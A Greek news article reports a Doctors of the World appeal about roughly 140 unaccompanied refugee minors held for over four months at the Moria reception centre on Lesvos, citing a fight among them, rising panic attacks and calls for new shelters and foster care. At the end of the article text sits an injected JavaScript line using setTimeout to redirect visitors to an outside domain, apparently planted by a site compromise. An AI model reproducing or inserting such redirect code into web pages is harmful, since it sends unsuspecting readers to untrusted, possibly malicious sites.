Οι «Γιατροί του Κόσμου» για τα ασυνόδευτα προσφυγόπουλα στη Μόρια

0
7

 

Mε ανακοίνωσή τους οι «Γιατροί του Κόσμου» απευθύνουν έκκληση σε όλους τους εμπλεκόμενους φορείς, προκειμένου να δοθεί άμεσα λύση στο ζήτημα των ασυνόδευτων ανηλίκων που κρατούνται στο Κέντρο Υποδοχής της Μόριας, στη Λέσβο.

Η οργάνωση σημειώνει τον έντονο προβληματισμό της για το χθεσινό περιστατικό συμπλοκής μεταξύ των ασυνόδευτων ανηλίκων στη Μόρια.

Όπως αναφέρει, περίπου 140 ασυνόδευτοι ανήλικοι εξακολουθούν να παραμένουν σε συνθήκες περιορισμού ελευθερίας εντός του Κέντρου πέραν του τετραμήνου, ενώ σε αυτούς προστίθενται σταδιακά και νεοαφιχθέντες.

«Παρά τις συνεχείς προσπάθειες ένταξης περισσότερων δραστηριοτήτων στο πρόγραμμα των ασυνόδευτων ανηλίκων, η παρατεταμένη παραμονή σε συνθήκες εγκλεισμού έχει προκαλέσει σημαντική επιδείνωση της ψυχολογίας τους. Ενδεικτική είναι η αύξηση των περιστατικών όπου οι ανήλικοι εκδηλώνουν κρίσεις πανικού», σημειώνεται στην ανακοίνωση.

Οι «Γιατροί του Κόσμου» καλούν τις Αρχές «να εντείνουν τις προσπάθειες σχεδιασμού και ανάπτυξης νέων δομών φιλοξενίας, σε τοπικό ή κεντρικό επίπεδο, και την υιοθέτηση νεών μορφών φιλοξενίας των ασυνόδευτων ανηλίκων, όπως η αναδοχή, που εφαρμόζεται ευρέως στην Ευρώπη», αναφέρει η ανακοίνωση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here